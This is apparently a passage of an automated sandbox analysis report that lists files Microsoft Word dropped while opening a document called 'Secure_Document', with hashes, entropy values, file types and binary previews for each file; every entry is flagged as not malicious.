                                                                                                                            SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                            SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):30
                                                                                                                            Entropy (8bit):1.2389205950315936
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:kf/X:kf/
                                                                                                                            MD5:741A49FA280320A77DF808F138F76B9A
                                                                                                                            SHA1:72921B1616265E80679E9CB5F078AA9BD8C0009C
                                                                                                                            SHA-256:0620D55DD837C6123C4AE56A9DDCF82094375103DF136A633D6318145E265F85
                                                                                                                            SHA-512:4B873EF66014BDCDB3AE351AF7902EE7965535BED2AC07033A0134914FA4D58D5265C85C4B2F2734A0DCEA6EA2B91264D5B252974A93F3EB0DF362BE683E8187
                                                                                                                            Malicious:false
                                                                                                                            Preview:..............................
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:52:08 2024, mtime=Mon Nov 18 15:55:35 2024, atime=Mon Nov 18 15:55:19 2024, length=100744, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):726
                                                                                                                            Entropy (8bit):4.736132181625171
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:83i0ohtzA+g4dRQQOjAyHi2Tv/1o+g4dRQZxDP6cmV:8EDzaEyAypQbxm
                                                                                                                            MD5:977992E6C958136D887A9FDD02C42E58
                                                                                                                            SHA1:826DD27DE8F119BAB9177F453D9BDD4CB92A570D
                                                                                                                            SHA-256:6CA60DD2CB5CA20A665F6902B226D4F88BE315348203BDCF6E05D81EFA439F79
                                                                                                                            SHA-512:E63A5F281D7C4B5D95623B278F54FAF07226007D05BACE0172752A7525B56923613ECD0448BDB6A30FFD95F3C83676EFE8ACCBAE356A89D208501EA5DCC948FC
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.... ....[[9.Y......9..I.(..9..............................2.....rY. .NOTEID~1.DOC.........GX.vrY.....&x.....................z..N.o.t.e.I.D. . .[.4.9.6.2.3.9.8.]. ._.S.e.c.u.r.e._.D.o.c.u.m.e.n.t._.M.r.e.t.t.i.n.g.e.r.-.4.6.5.6.8...d.o.c.x.......................-.......~............F.......C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx..O.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.o.t.e.I.D. . .[.4.9.6.2.3.9.8.]. ._.S.e.c.u.r.e._.D.o.c.u.m.e.n.t._.M.r.e.t.t.i.n.g.e.r.-.4.6.5.6.8...d.o.c.x.`.......X.......642294...........hT..CrF.f4... ....F...../....%..hT..CrF.f4... ....F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):137
                                                                                                                            Entropy (8bit):5.003027836563308
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HgKRAAFF+RRQQ6hyDEqnTtUlm43AFF+RRQQ6hyDEqnTtUlv:HPF/hQJBnTtUa/hQJBnTtU1
                                                                                                                            MD5:1B91613946BA5D4F98C411E90926CEF6
                                                                                                                            SHA1:AD287EF738C9486DA1C39BE5A1F9542FC75DB895
                                                                                                                            SHA-256:FBD1E4E5FB194C46D362148E8F84A025D859F1353B3A4D76CE71741F02CD8082
                                                                                                                            SHA-512:4B369D04EDA050E849DF14D180319DABED47A2618567CE597A73EA4FE4B4CC87BA64B5E15C12BF38D4538686D80CAD40682ADBA4EDF3B3B7710880CA0F56CA1A
                                                                                                                            Malicious:false
                                                                                                                            Preview:[misc]..NoteID [4962398] _Secure_Document_Mrettinger-46568.LNK=0..[folders]..NoteID [4962398] _Secure_Document_Mrettinger-46568.LNK=0..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):562113
                                                                                                                            Entropy (8bit):7.67409707491542
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                            MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                            SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                            SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                            SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1649585
                                                                                                                            Entropy (8bit):7.875240099125746
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                            MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                            SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                            SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                            SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):558035
                                                                                                                            Entropy (8bit):7.696653383430889
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                            MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                            SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                            SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                            SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):570901
                                                                                                                            Entropy (8bit):7.674434888248144
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                            MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                            SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                            SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                            SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):523048
                                                                                                                            Entropy (8bit):7.715248170753013
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                            MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                            SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                            SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                            SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3078052
                                                                                                                            Entropy (8bit):7.954129852655753
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                            MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                            SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                            SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                            SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):777647
                                                                                                                            Entropy (8bit):7.689662652914981
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                            MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                            SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                            SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                            SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):924687
                                                                                                                            Entropy (8bit):7.824849396154325
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                            MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                            SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                            SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                            SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):966946
                                                                                                                            Entropy (8bit):7.8785200658952
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                            MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                            SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                            SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                            SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1204049
                                                                                                                            Entropy (8bit):7.92476783994848
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                            MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                            SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                            SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                            SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):486596
                                                                                                                            Entropy (8bit):7.668294441507828
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                            MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                            SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                            SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                            SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):976001
                                                                                                                            Entropy (8bit):7.791956689344336
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
